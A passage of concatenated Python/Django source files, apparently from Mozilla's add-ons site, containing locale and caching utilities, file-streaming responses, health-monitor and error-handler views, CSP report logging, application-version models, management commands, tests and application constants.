    return translation.trans_real.to_language(locale)
def get_locale_from_lang(lang):
    """Pass in a language (u'en-US') get back a Locale object courtesy of
    Babel.  Use this to figure out currencies, bidi, names, etc."""
    # The 'dbg' pseudo-locale (and empty values) act like English for
    # formatting purposes.
    effective = lang if lang and lang != 'dbg' else 'en'
    return Locale(translation.to_locale(effective))
class HttpResponseSendFile(http.HttpResponse):
    """Response that streams a file, delegating to X-Sendfile when enabled.

    With settings.XSENDFILE the web server serves the file (the response
    body stays empty); otherwise the file is streamed from Python, using
    the WSGI file wrapper when the server provides one.
    """

    def __init__(self, request, path, content=None, status=None,
                 content_type='application/octet-stream', etag=None):
        self.request = request
        self.path = path
        super(HttpResponseSendFile, self).__init__('', status=status,
                                                   content_type=content_type)
        if settings.XSENDFILE:
            # Tell the front-end server which file to serve.
            self[settings.XSENDFILE_HEADER] = path
        if etag:
            self['ETag'] = '"%s"' % etag

    def __iter__(self):
        if settings.XSENDFILE:
            # Body intentionally empty; the server serves the file itself.
            return iter([])

        chunk = 4096
        fp = open(self.path, 'rb')
        if 'wsgi.file_wrapper' in self.request.META:
            # Let the WSGI server stream (and close) the file efficiently.
            return self.request.META['wsgi.file_wrapper'](fp, chunk)
        else:
            self['Content-Length'] = os.path.getsize(self.path)

            def wrapper():
                # Generator that streams the file in fixed-size chunks.
                while 1:
                    data = fp.read(chunk)
                    if not data:
                        break
                    yield data
            return wrapper()
def redirect_for_login(request):
    """Redirect to the login page, preserving the current path in ``?to=``."""
    # We can't use urlparams here, because it escapes slashes,
    # which a large number of tests don't expect
    next_url = urlquote(request.get_full_path())
    return http.HttpResponseRedirect(
        '%s?to=%s' % (reverse('users.login'), next_url))
def cache_ns_key(namespace, increment=False):
    """
    Returns a key with namespace value appended. If increment is True, the
    namespace will be incremented effectively invalidating the cache.

    Memcache doesn't have namespaces, but we can simulate them by storing a
    "%(key)s_namespace" value. Invalidating the namespace simply requires
    editing that key. Your application will no longer request the old keys,
    and they will eventually fall off the end of the LRU and be reclaimed.
    """
    ns_key = 'ns:%s' % namespace
    if increment:
        try:
            ns_val = cache.incr(ns_key)
        except ValueError:
            # Counter missing or non-numeric: reseed with the current time.
            log.info('Cache increment failed for key: %s. Resetting.' % ns_key)
            ns_val = epoch(datetime.datetime.now())
            cache.set(ns_key, ns_val, None)
        return '%s:%s' % (ns_val, ns_key)

    ns_val = cache.get(ns_key)
    if ns_val is None:
        # First use of this namespace: seed it with the current time.
        ns_val = epoch(datetime.datetime.now())
        cache.set(ns_key, ns_val, None)
    return '%s:%s' % (ns_val, ns_key)
def get_email_backend(real_email=False):
    """Get a connection to an email backend.

    If settings.SEND_REAL_EMAIL is False, a debugging backend is returned.
    """
    use_real = real_email or settings.SEND_REAL_EMAIL
    backend = None if use_real else 'amo.mail.FakeEmailBackend'
    return django.core.mail.get_connection(backend)
class ESPaginator(paginator.Paginator):
    """A better paginator for search results."""
    # The normal Paginator does a .count() query and then a slice. Since ES
    # results contain the total number of results, we can take an optimistic
    # slice and then adjust the count.
    def page(self, number):
        """Return the requested page without a separate count query."""
        # Fake num_pages so it looks like we can have results.
        # (validate_number compares against num_pages, which we don't know
        # yet — infinity lets any positive page through; reset afterwards.)
        self._num_pages = float('inf')
        number = self.validate_number(number)
        self._num_pages = None

        bottom = (number - 1) * self.per_page
        top = bottom + self.per_page
        page = paginator.Page(self.object_list[bottom:top], number, self)

        # Force the search to evaluate and then attach the count.
        list(page.object_list)
        self._count = page.object_list.count()
        return page
def smart_path(string):
    """Returns a string you can pass to path.path safely."""
    # Pick unicode or byte strings based on filesystem support.
    converter = (smart_unicode if os.path.supports_unicode_filenames
                 else smart_str)
    return converter(string)
def log_cef(name, severity, env, *args, **kwargs):
    """Simply wraps the cef_log function so we don't need to pass in the config
    dictionary every time. See bug 707060. env can be either a request
    object or just the request.META dictionary"""
    # Static CEF configuration pulled from settings (with safe fallbacks).
    c = {'cef.product': getattr(settings, 'CEF_PRODUCT', 'AMO'),
         'cef.vendor': getattr(settings, 'CEF_VENDOR', 'Mozilla'),
         'cef.version': getattr(settings, 'CEF_VERSION', '0'),
         'cef.device_version': getattr(settings, 'CEF_DEVICE_VERSION', '0'),
         'cef.file': getattr(settings, 'CEF_FILE', 'syslog'), }

    # The CEF library looks for some things in the env object like
    # REQUEST_METHOD and any REMOTE_ADDR stuff. Django not only doesn't send
    # half the stuff you'd expect, but it specifically doesn't implement
    # readline on its FakePayload object so these things fail. I have no idea
    # if that's outdated code in Django or not, but andym made this
    # <strike>awesome</strike> less crappy so the tests will actually pass.
    # In theory, the last part of this if() will never be hit except in the
    # test runner. Good luck with that.
    if isinstance(env, HttpRequest):
        r = env.META.copy()
        if 'PATH_INFO' in r:
            # CEF wants the full URL, not just the path.
            r['PATH_INFO'] = env.build_absolute_uri(r['PATH_INFO'])
    elif isinstance(env, dict):
        r = env
    else:
        r = {}

    if settings.USE_HEKA_FOR_CEF:
        return heka.cef(name, severity, r, *args, config=c, **kwargs)
    else:
        return _log_cef(name, severity, r, *args, config=c, **kwargs)
@contextlib.contextmanager
def no_translation(lang=None):
    """
    Activate the settings lang, or lang provided, while in context.
    """
    old_lang = translation.trans_real.get_language()
    if lang:
        translation.trans_real.activate(lang)
    else:
        translation.trans_real.deactivate()
    try:
        yield
    finally:
        # Restore the previous language even when the body raises; otherwise
        # an exception inside the block leaked the temporary language state.
        translation.trans_real.activate(old_lang)
def escape_all(v):
    """Escape html in JSON value, including nested items.

    Strings are escaped (and linkified) and returned as new values; lists
    and dicts are mutated *in place*, element by element.
    """
    if isinstance(v, basestring):
        v = jinja2.escape(smart_unicode(v))
        v = linkify_with_outgoing(v)
        return v
    elif isinstance(v, list):
        # Recurse, replacing each element in the original list.
        for i, lv in enumerate(v):
            v[i] = escape_all(lv)
    elif isinstance(v, dict):
        # Recurse, replacing each value in the original dict.
        for k, lv in v.iteritems():
            v[k] = escape_all(lv)
    elif isinstance(v, Translation):
        # Translations are escaped but NOT linkified, unlike plain strings.
        v = jinja2.escape(smart_unicode(v.localized_string))
    return v
class LocalFileStorage(FileSystemStorage):
    """Local storage to an unregulated absolute file path.

    Unregulated means that, unlike the default file storage, you can write to
    any path on the system if you have access.

    Unlike Django's default FileSystemStorage, this class behaves more like a
    "cloud" storage system. Specifically, you never have to write defensive
    code that prepares for leading directory paths to exist.
    """

    def __init__(self, base_url=None):
        # Root the storage at '/' so ``name`` is treated as an absolute path.
        super(LocalFileStorage, self).__init__(location='/', base_url=base_url)

    def delete(self, name):
        """Delete a file or empty directory path.

        Unlike the default file system storage this will also delete an empty
        directory path. This behavior is more in line with other storage
        systems like S3.
        """
        full_path = self.path(name)
        if os.path.isdir(full_path):
            os.rmdir(full_path)
        else:
            return super(LocalFileStorage, self).delete(name)

    def _open(self, name, mode='rb'):
        # Create missing parent directories when opening for write, so
        # callers never need to prepare directory trees themselves.
        if mode.startswith('w'):
            parent = os.path.dirname(self.path(name))
            try:
                # Try/except to prevent race condition raising "File exists".
                os.makedirs(parent)
            except OSError as e:
                if e.errno == errno.EEXIST and os.path.isdir(parent):
                    pass
                else:
                    raise
        return super(LocalFileStorage, self)._open(name, mode=mode)

    def path(self, name):
        """Actual file system path to name without any safety checks."""
        return os.path.normpath(os.path.join(self.location,
                                             self._smart_path(name)))

    def _smart_path(self, string):
        # Use unicode paths only where the filesystem supports them.
        if os.path.supports_unicode_filenames:
            return smart_unicode(string)
        return smart_str(string)
def strip_bom(data):
    """
    Strip the BOM (byte order mark) from byte string `data`.

    Returns a new byte string.
    """
    # Longest BOMs first: UTF-32 LE begins with the UTF-16 LE BOM bytes.
    boms = (codecs.BOM_UTF32_BE, codecs.BOM_UTF32_LE,
            codecs.BOM_UTF16_BE, codecs.BOM_UTF16_LE,
            codecs.BOM_UTF8)
    for bom in boms:
        if data.startswith(bom):
            return data[len(bom):]
    return data
def smart_decode(s):
    """Guess the encoding of a string and decode it."""
    # Already unicode: nothing to do.
    if isinstance(s, unicode):
        return s
    enc_guess = chardet.detect(s)
    try:
        return s.decode(enc_guess['encoding'])
    except (UnicodeDecodeError, TypeError), exc:
        # TypeError covers chardet returning encoding=None (undetectable).
        msg = 'Error decoding string (encoding: %r %.2f%% sure): %s: %s'
        log.error(msg % (enc_guess['encoding'],
                         enc_guess['confidence'] * 100.0,
                         exc.__class__.__name__, exc))
        # Last resort: decode with replacement characters for bad bytes.
        return unicode(s, errors='replace')
def attach_trans_dict(model, objs):
    """Put all translations into a translations dict.

    For every object in ``objs``, sets ``obj.translations`` mapping each
    translation id to a list of (locale, string) tuples for that field.
    """
    # Get the ids of all the translations we need to fetch.
    fields = model._meta.translated_fields
    ids = [getattr(obj, f.attname) for f in fields
           for obj in objs if getattr(obj, f.attname, None) is not None]

    # Get translations in a dict, ids will be the keys. It's important to
    # consume the result of sorted_groupby, which is an iterator.
    qs = Translation.objects.filter(id__in=ids, localized_string__isnull=False)
    all_translations = dict((k, list(v)) for k, v in
                            sorted_groupby(qs, lambda trans: trans.id))

    def get_locale_and_string(translation, new_class):
        """Convert the translation to new_class (making PurifiedTranslations
           and LinkifiedTranslations work) and return locale / string tuple."""
        converted_translation = new_class()
        converted_translation.__dict__ = translation.__dict__
        return (converted_translation.locale.lower(),
                unicode(converted_translation))

    # Build and attach translations for each field on each object.
    for obj in objs:
        obj.translations = collections.defaultdict(list)
        for field in fields:
            t_id = getattr(obj, field.attname, None)
            field_translations = all_translations.get(t_id, None)
            if not t_id or field_translations is None:
                continue

            # field.rel.to is the concrete Translation subclass to use.
            obj.translations[t_id] = [get_locale_and_string(t, field.rel.to)
                                      for t in field_translations]
def rm_local_tmp_dir(path):
    """Remove a local temp directory.

    This is just a wrapper around shutil.rmtree(). Use it to indicate you are
    certain that your executing code is operating on a local temp dir, not a
    directory managed by the Django Storage API.
    """
    # Intentionally a thin wrapper: the name documents the caller's intent.
    return shutil.rmtree(path)
def rm_local_tmp_file(path):
    """Remove a local temp file.

    This is just a wrapper around os.unlink(). Use it to indicate you are
    certain that your executing code is operating on a local temp file, not a
    path managed by the Django Storage API.
    """
    # Intentionally a thin wrapper: the name documents the caller's intent.
    return os.unlink(path)
def timestamp_index(index):
    """Returns index-YYYYMMDDHHMMSS with the current time."""
    suffix = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
    return '%s-%s' % (index, suffix)
def timer(*func, **kwargs):
    """
    Outputs statsd timings for the decorated method, ignored if not
    in test suite. It will give us a name that's based on the module name.

    It will work without params. Or with the params:
    key: a key to override the calculated one
    test_only: only time while in test suite (default is True)
    """
    key = kwargs.get('key', None)
    test_only = kwargs.get('test_only', True)

    def decorator(fn):
        @functools.wraps(fn)
        def wrapper(*args, **kw):
            if test_only and not settings.IN_TEST_SUITE:
                return fn(*args, **kw)
            name = key or '%s.%s' % (fn.__module__, fn.__name__)
            with statsd.timer('timer.%s' % name):
                return fn(*args, **kw)
        return wrapper

    # Bare usage (@timer) passes the function positionally; parameterized
    # usage (@timer(key=...)) returns the decorator itself.
    if func:
        return decorator(func[0])
    return decorator
def find_language(locale):
    """
    Return a locale we support, or None.
    """
    if not locale:
        return None

    supported = settings.AMO_LANGUAGES + settings.HIDDEN_LANGUAGES
    if locale in supported:
        return locale

    # Check if locale has a short equivalent.
    short = settings.SHORTER_LANGUAGES.get(locale)
    if short:
        return short

    # Check if locale is something like en_US that needs to be converted.
    converted = to_language(locale)
    if converted in supported:
        return converted

    return None
def has_links(html):
    """Return True if links (text or markup) are found in the given html."""

    class LinkFound(Exception):
        pass

    def raise_on_link(attrs, new):
        # bleach invokes this callback for every link it finds or creates.
        raise LinkFound

    # bleach.linkify fires the callback for both markup links and bare text
    # URLs, so any callback hit means the html contains a link.
    try:
        bleach.linkify(html, callbacks=[raise_on_link])
    except LinkFound:
        return True
    return False
########NEW FILE########
__FILENAME__ = views
import json
from django import http
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.http import HttpResponse, HttpResponseBadRequest
from django.shortcuts import render
from django.utils.encoding import iri_to_uri
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
import commonware.log
import waffle
from django_statsd.views import record as django_statsd_record
from django_statsd.clients import statsd
import amo
import api
from amo.decorators import post_required
from amo.utils import log_cef
from amo.context_processors import get_collect_timings
from . import monitors
log = commonware.log.getLogger('z.amo')
monitor_log = commonware.log.getLogger('z.monitor')
jp_log = commonware.log.getLogger('z.jp.repack')
@never_cache
def monitor(request, format=None):
    """Run all service health checks and report results (HTML or JSON)."""
    # For each check, a boolean pass/fail status to show in the template
    status_summary = {}
    results = {}

    checks = ['memcache', 'libraries', 'elastic', 'package_signer', 'path',
              'redis', 'receipt_signer', 'settings_check', 'solitude']

    for check in checks:
        # Each check name maps to a function of the same name in monitors.
        with statsd.timer('monitor.%s' % check) as timer:
            status, result = getattr(monitors, check)()
        # state is a string. If it is empty, that means everything is fine.
        status_summary[check] = {'state': not status,
                                 'status': status}
        results['%s_results' % check] = result
        results['%s_timer' % check] = timer.ms

    # If anything broke, send HTTP 500.
    status_code = 200 if all(a['state']
                             for a in status_summary.values()) else 500

    if format == '.json':
        return http.HttpResponse(json.dumps(status_summary),
                                 status=status_code)
    ctx = {}
    ctx.update(results)
    ctx['status_summary'] = status_summary

    return render(request, 'services/monitor.html', ctx, status=status_code)
def robots(request):
    """Generate a robots.txt"""
    # On the services domain, or when robots are disabled, block everything.
    _service = (request.META['SERVER_NAME'] == settings.SERVICES_DOMAIN)
    if _service or not settings.ENGAGE_ROBOTS:
        template = "User-agent: *\nDisallow: /"
    else:
        # NOTE(review): render() returns an HttpResponse that is then used
        # as the content of a new HttpResponse below — works because
        # responses are iterable, but looks accidental; confirm intent.
        template = render(request, 'amo/robots.html', {'apps': amo.APP_USAGE})

    return HttpResponse(template, mimetype="text/plain")
def handler403(request):
    """Serve a 403 page; API paths delegate to the API's own handler."""
    if request.path_info.startswith('/api/'):
        # Pass over to handler403 view in api if api was targeted.
        return api.views.handler403(request)
    return render(request, 'amo/403.html', status=403)
def handler404(request):
    """Serve a 404 page; API paths delegate to the API's own handler."""
    if request.path_info.startswith('/api/'):
        # Pass over to handler404 view in api if api was targeted.
        return api.views.handler404(request)
    return render(request, 'amo/404.html', status=404)
def handler500(request):
    """Serve a 500 page; API paths delegate to the API's own handler."""
    if request.path_info.startswith('/api/'):
        # Pass over to handler500 view in api if api was targeted.
        return api.views.handler500(request)
    return render(request, 'amo/500.html', status=500)
def csrf_failure(request, reason=''):
    """Render the 403 page, flagging CSRF failures for the template."""
    context = {'because_csrf': 'CSRF' in reason}
    return render(request, 'amo/403.html', context, status=403)
def loaded(request):
    # Report whether the WSGI app finished loading (flag set by the wsgi
    # wrapper in request.META).
    return http.HttpResponse('%s' % request.META['wsgi.loaded'],
                             content_type='text/plain')
@csrf_exempt
@require_POST
def cspreport(request):
    """Accept CSP reports and log them."""
    # Only these fields of the report are forwarded to the CEF log.
    report = ('blocked-uri', 'violated-directive', 'original-policy')

    if not waffle.sample_is_active('csp-store-reports'):
        # Sampling disabled: accept silently without logging.
        return HttpResponse()

    try:
        v = json.loads(request.body)['csp-report']
        # If possible, alter the PATH_INFO to contain the request of the page
        # the error occurred on, spec: http://mzl.la/P82R5y
        meta = request.META.copy()
        meta['PATH_INFO'] = v.get('document-uri', meta['PATH_INFO'])
        v = [(k, v[k]) for k in report if k in v]
        log_cef('CSPViolation', 5, meta, username=request.user,
                signature='CSPREPORT',
                msg='A client reported a CSP violation',
                cs6=v, cs6Label='ContentPolicy')
    except (KeyError, ValueError), e:
        # Malformed JSON or missing csp-report key: reject the payload.
        log.debug('Exception in CSP report: %s' % e, exc_info=True)
        return HttpResponseBadRequest()

    return HttpResponse()
@csrf_exempt
@post_required
def record(request):
    """Forward client timing data to statsd when collection is enabled."""
    # The rate limiting is done up on the client, but if things go wrong
    # we can just turn the percentage down to zero.
    if get_collect_timings():
        return django_statsd_record(request)
    raise PermissionDenied
def plugin_check_redirect(request):
    """Redirect plugin-check requests to PFS, preserving the query string."""
    query = iri_to_uri(request.META.get('QUERY_STRING', ''))
    return http.HttpResponseRedirect('%s?%s' % (settings.PFS_URL, query))
########NEW FILE########
__FILENAME__ = widgets
from django.forms.widgets import Input
class EmailWidget(Input):
    """HTML5 email type."""
    input_type = 'email'

    def __init__(self, *args, **kwargs):
        # Optional placeholder attribute rendered on the input element.
        self.placeholder = kwargs.pop('placeholder', None)
        # __init__ must return None; the old ``return super(...).__init__``
        # only worked because Input.__init__ happens to return None.
        super(EmailWidget, self).__init__(*args, **kwargs)

    def render(self, name, value, attrs=None):
        attrs = attrs or {}
        if self.placeholder:
            attrs['placeholder'] = self.placeholder
        return super(EmailWidget, self).render(name, value, attrs)
class ColorWidget(Input):
    """HTML5 color type."""
    input_type = 'color'

    def __init__(self, *args, **kwargs):
        # Optional placeholder attribute rendered on the input element.
        self.placeholder = kwargs.pop('placeholder', None)
        # __init__ must return None; the old ``return super(...).__init__``
        # only worked because Input.__init__ happens to return None.
        super(ColorWidget, self).__init__(*args, **kwargs)

    def render(self, name, value, attrs=None):
        attrs = attrs or {}
        if self.placeholder:
            attrs['placeholder'] = self.placeholder
        return super(ColorWidget, self).render(name, value, attrs)
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from .models import Application, AppVersion
class AppVersionAdmin(admin.StackedInline):
    # Inline editor for an application's versions, newest first.
    model = AppVersion
    ordering = ('-version_int',)


class ApplicationAdmin(admin.ModelAdmin):
    # Edit an application's versions inline on the application page.
    inlines = [AppVersionAdmin]


admin.site.register(Application, ApplicationAdmin)
########NEW FILE########
__FILENAME__ = addnewversion
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
import commonware.log
import amo.models
from applications.models import AppVersion
class Command(BaseCommand):
    """Management command: add a new AppVersion for an application."""
    help = ('Add a new version to a Application. Syntax: \n'
            '    ./manage.py addnewversion <application_name> <version>')
    log = commonware.log.getLogger('z.appversions')

    def handle(self, *args, **options):
        # Expects exactly two positional args: application name and version.
        try:
            do_addnewversion(args[0], args[1])
        except IndexError:
            raise CommandError(self.help)
        msg = 'Adding version %r to application %r\n' % (args[1], args[0])
        self.log.info(msg)
        self.stdout.write(msg)
def do_addnewversion(application, version):
    """Create an AppVersion row for `application` with `version`.

    Raises CommandError when the application short name is unknown or the
    version already exists (surfaced as an IntegrityError by the db).
    """
    if application not in amo.APPS:
        raise CommandError('Application %r does not exist.' % application)
    try:
        AppVersion.objects.create(application_id=amo.APPS[application].id,
                                  version=version)
    # `except ... as` replaces the deprecated `except X, e` comma syntax;
    # it is valid from Python 2.6 onward and behaves identically.
    except IntegrityError as e:
        raise CommandError('Version %r already exists: %r' % (version, e))
########NEW FILE########
__FILENAME__ = dump_apps
import json
import os
from django.conf import settings
from django.core.management.base import BaseCommand
from django.core.files.storage import default_storage as storage
import commonware.log
import amo
from applications.models import Application, AppVersion
log = commonware.log.getLogger('z.cron')
# The validator uses the file created here to keep up to date with the
# apps and versions on AMO.
class Command(BaseCommand):
    """Dump supported apps and their versions to a JSON file on storage."""
    help = 'Dump a json file containing AMO apps and versions.'
    JSON_PATH = os.path.join(settings.NETAPP_STORAGE, 'apps.json')
    def handle(self, *args, **kw):
        """Collect supported applications plus their versions as JSON.

        Output shape: {app_id: {guid, name, versions: [...]}} where
        versions are ordered by version_int ascending.
        """
        apps = {}
        for id, guid in (Application.objects.values_list('id', 'guid')
                         .exclude(supported=0)):
            apps[id] = dict(guid=guid, versions=[],
                            name=amo.APPS_ALL[id].short)
        versions = (AppVersion.objects.values_list('application', 'version')
                    .order_by('version_int'))
        for app, version in versions:
            try:
                apps[app]['versions'].append(version)
            except KeyError:
                # Sunbird is still in the database but shouldn't show up here.
                pass
        # Local file, to be read by validator.
        with storage.open(self.JSON_PATH, 'w') as f:
            json.dump(apps, f)
        log.debug("Wrote: %s" % f.name)
########NEW FILE########
__FILENAME__ = models
from django.db import models
import amo.models
from versions import compare
class Application(amo.models.ModelBase):
    """A product (Firefox, Thunderbird, ...) that add-ons can target."""
    guid = models.CharField(max_length=255, default='')
    supported = models.BooleanField(default=1)
    # We never reference these translated fields, so stop loading them.
    # name = TranslatedField()
    # shortname = TranslatedField()
    class Meta:
        db_table = 'applications'
    def __unicode__(self):
        # The display name comes from the static amo constants, keyed by pk.
        return unicode(amo.APPS_ALL[self.id].pretty)
class AppVersion(amo.models.ModelBase):
    """A valid version string for an Application (e.g. Firefox '3.6.*')."""
    application = models.ForeignKey(Application)
    version = models.CharField(max_length=255, default='')
    # Numeric encoding of `version`, used for sorting and comparisons.
    version_int = models.BigIntegerField(editable=False)
    class Meta:
        db_table = 'appversions'
        ordering = ['-version_int']
    def save(self, *args, **kw):
        """Derive version_int from `version` if unset before saving."""
        if not self.version_int:
            self.version_int = compare.version_int(self.version)
        return super(AppVersion, self).save(*args, **kw)
    def __init__(self, *args, **kwargs):
        super(AppVersion, self).__init__(*args, **kwargs)
        # Add all the major, minor, ..., version attributes to the object.
        self.__dict__.update(compare.version_dict(self.version or ''))
    def __unicode__(self):
        return self.version
    def flush_urls(self):
        # URL patterns whose caches should be invalidated for this object.
        return ['*/pages/appversions/*']
########NEW FILE########
__FILENAME__ = tests
import json
from django.core.management import call_command
from nose.tools import eq_
import amo
import amo.tests
from amo.helpers import url
from applications.models import AppVersion, Application
from applications.management.commands import dump_apps
class TestAppVersion(amo.tests.TestCase):
    """Unit tests for the version-parsing attributes on AppVersion."""
    def test_major_minor(self):
        """Check that major/minor/alpha is getting set."""
        v = AppVersion(version='3.0.12b2')
        eq_(v.major, 3)
        eq_(v.minor1, 0)
        eq_(v.minor2, 12)
        eq_(v.minor3, None)
        eq_(v.alpha, 'b')
        eq_(v.alpha_ver, 2)
        # A version carrying both an alpha marker and a pre-release suffix.
        v = AppVersion(version='3.6.1apre2+')
        eq_(v.major, 3)
        eq_(v.minor1, 6)
        eq_(v.minor2, 1)
        eq_(v.alpha, 'a')
        eq_(v.pre, 'pre')
        eq_(v.pre_ver, 2)
        # The empty string parses to all-None components.
        v = AppVersion(version='')
        eq_(v.major, None)
        eq_(v.minor1, None)
        eq_(v.minor2, None)
        eq_(v.minor3, None)
class TestApplication(amo.tests.TestCase):
    """Checks the Application model against the static amo constants."""
    fixtures = ['applications/all_apps.json']
    def test_string_representation(self):
        """
        Check that the string representation of the app model instances
        matches out constants
        """
        for static_app in amo.APP_USAGE:
            model_app = Application.objects.get(id=static_app.id)
            eq_(unicode(model_app), unicode(static_app.pretty))
class TestViews(amo.tests.TestCase):
    """Smoke tests: the appversions page and its RSS feed respond with 200."""
    fixtures = ['base/apps', 'base/appversion']
    def test_appversions(self):
        eq_(self.client.get(url('apps.appversions')).status_code, 200)
    def test_appversions_feed(self):
        eq_(self.client.get(url('apps.appversions.rss')).status_code, 200)
class TestCommands(amo.tests.TestCase):
    """Tests for the dump_apps management command."""
    fixtures = ['applications/all_apps.json', 'base/apps', 'base/appversion']
    def test_dump_apps(self):
        """Run dump_apps and verify the JSON matches the database contents."""
        call_command('dump_apps')
        with open(dump_apps.Command.JSON_PATH, 'r') as f:
            apps = json.load(f)
        db_apps = Application.objects.all()
        assert len(db_apps)
        for app in db_apps:
            data = apps[str(app.id)]
            versions = sorted([a.version for a in
                               AppVersion.objects.filter(application=app)])
            r_app = amo.APPS_ALL[app.id]
            # Prefix with the app's short name so failures identify the app.
            eq_("%s: %r" % (r_app.short, sorted(data['versions'])),
                "%s: %r" % (r_app.short, versions))
            eq_(data['name'], r_app.short)
            eq_(data['guid'], app.guid)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
# HTML page plus an RSS feed of acceptable application versions.
urlpatterns = patterns('',
    url('^$', views.appversions, name='apps.appversions'),
    url('^format:rss$', views.AppversionsFeed(), name='apps.appversions.rss'),
)
########NEW FILE########
__FILENAME__ = views
from django.contrib.syndication.views import Feed
from django.shortcuts import render
import caching.base as caching
from tower import ugettext as _
import amo
from amo.helpers import url, absolutify
from .models import AppVersion
def get_versions(order=('application', 'version_int')):
    """Return (apps, {app_id: [version, ...]}), cached per sort order."""
    def fetch():
        apps = amo.APP_USAGE
        by_app = {}
        for app in apps:
            by_app[app.id] = []
        rows = list(AppVersion.objects.order_by(*order)
                    .filter(application__in=by_app)
                    .values_list('application', 'version'))
        for app_id, version in rows:
            by_app[app_id].append(version)
        return apps, by_app
    # The cache key varies with the ordering so ascending and descending
    # results do not collide.
    return caching.cached(fetch, 'getv' + ''.join(order))
def appversions(request):
    """Render the page listing acceptable versions for each application."""
    apps, versions = get_versions()
    context = {'apps': apps, 'versions': versions}
    return render(request, 'applications/appversions.html', context)
class AppversionsFeed(Feed):
    """RSS feed of the three most recent versions for each application."""
    # appversions aren't getting a created date so the sorting is kind of
    # wanky. I blame fligtar.
    def title(self):
        return _('Application Versions')
    def link(self):
        return absolutify(url('apps.appversions'))
    def description(self):
        return _('Acceptable versions for all applications on AMO.')
    def items(self):
        """Yield (app, version) pairs, newest first, max three per app."""
        apps, versions = get_versions(order=('application', '-version_int'))
        # The original had a second, unreachable `return` after this one
        # (dead code); it has been removed.
        return [(app, version) for app in apps
                for version in versions[app.id][:3]]
    def item_title(self, item):
        app, version = item
        return u'%s %s' % (app.pretty, version)
    item_description = ''
    def item_link(self):
        return self.link()
    def item_guid(self, item):
        # Make each (app, version) pair a unique guid under the feed link.
        return self.item_link() + '%s:%s' % item
########NEW FILE########
__FILENAME__ = applications
from versions.compare import version_int as vint
from tower import ugettext_lazy as _
from base import *
class App:
    """Base class for the per-application constant classes below."""
    @classmethod
    def matches_user_agent(cls, user_agent):
        # Plain substring match against this app's UA token; subclasses
        # with more complex needs override this.
        found = user_agent.find(cls.user_agent_string) != -1
        return found
# Applications
class FIREFOX(App):
    """Constants for desktop Firefox."""
    id = 1
    shortername = 'fx'
    short = 'firefox'
    pretty = _(u'Firefox')
    browser = True
    types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
             ADDON_LPAPP, ADDON_PLUGIN, ADDON_PERSONA, ADDON_WEBAPP]
    guid = '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}'
    min_display_version = 3.0
    # These versions were relabeled and should not be displayed.
    exclude_versions = (3.1, 3.7, 4.2)
    backup_version = vint('3.7.*')
    user_agent_string = 'Firefox'
    platforms = 'desktop'  # DESKTOP_PLATFORMS (set in constants.platforms)
    @classmethod
    def matches_user_agent(cls, user_agent):
        """Match desktop Firefox only.

        Mobile builds also carry the 'Firefox' token, so UAs containing
        Android/Mobile/Tablet markers are rejected here.
        """
        matches = cls.user_agent_string in user_agent
        if ('Android' in user_agent or 'Mobile' in user_agent or
            'Tablet' in user_agent):
            matches = False
        return matches
class THUNDERBIRD(App):
id = 18
short = 'thunderbird'
shortername = 'tb'
pretty = _(u'Thunderbird')
browser = False
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_LPAPP,
ADDON_PERSONA]
guid = '{3550f703-e582-4d05-9a08-453d09bdfdc6}'
min_display_version = 1.0
user_agent_string = 'Thunderbird'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class SEAMONKEY(App):
id = 59
short = 'seamonkey'
shortername = 'sm'
pretty = _(u'SeaMonkey')
browser = True
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PLUGIN, ADDON_PERSONA]
guid = '{92650c4d-4b8e-4d2a-b7eb-24ecf4f6b63a}'
min_display_version = 1.0
exclude_versions = (1.5,)
latest_version = None
user_agent_string = 'SeaMonkey'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class SUNBIRD(App):
"""This application is retired and should not be used on the site. It
remains as there are still some sunbird add-ons in the db."""
id = 52
short = 'sunbird'
shortername = 'sb'
pretty = _(u'Sunbird')
browser = False
types = [ADDON_EXTENSION, ADDON_THEME, ADDON_DICT, ADDON_LPAPP]
guid = '{718e30fb-e89b-41dd-9da7-e25a45638b28}'
min_display_version = 0.2
latest_version = None
user_agent_string = 'Sunbird'
platforms = 'desktop' # DESKTOP_PLATFORMS (set in constants.platforms)
class MOBILE(App):
id = 60
short = 'mobile'
shortername = 'fn'
pretty = _(u'Mobile')
browser = True
types = [ADDON_EXTENSION, ADDON_DICT, ADDON_SEARCH,
ADDON_LPAPP, ADDON_PERSONA]
guid = '{a23983c0-fd0e-11dc-95ff-0800200c9a66}'
min_display_version = 0.1
user_agent_string = 'Fennec'
platforms = 'mobile' # DESKTOP_PLATFORMS (set in constants.platforms)
class ANDROID(App):
    # This is for the Android native Firefox.
    id = 61
    short = 'android'
    shortername = 'an'
    pretty = _(u'Firefox for Android')
    browser = True
    types = [ADDON_EXTENSION, ADDON_DICT, ADDON_SEARCH,
             ADDON_LPAPP, ADDON_PERSONA]
    guid = '{aa3c5121-dab2-40e2-81ca-7ea25febc110}'
    min_display_version = 11.0
    user_agent_string = 'Fennec'
    # Mobile and Android have the same user agent. The only way to distinguish
    # is by the version number.
    user_agent_re = [re.compile('Fennec/([\d.]+)'),
                     re.compile('Android; Mobile; rv:([\d.]+)'),
                     re.compile('Android; Tablet; rv:([\d.]+)'),
                     re.compile('Mobile; rv:([\d.]+)'),
                     re.compile('Tablet; rv:([\d.]+)')]
    platforms = 'mobile'
    latest_version = None
    @classmethod
    def matches_user_agent(cls, user_agent):
        """Match a native Firefox-for-Android UA with version >= 11.0."""
        for user_agent_re in cls.user_agent_re:
            match = user_agent_re.search(user_agent)
            if match:
                v = match.groups()[0]
                return vint(cls.min_display_version) <= vint(v)
        # NOTE(review): implicitly returns None (falsy) when nothing matches
        # -- callers appear to rely only on truthiness; confirm before
        # changing this to an explicit False.
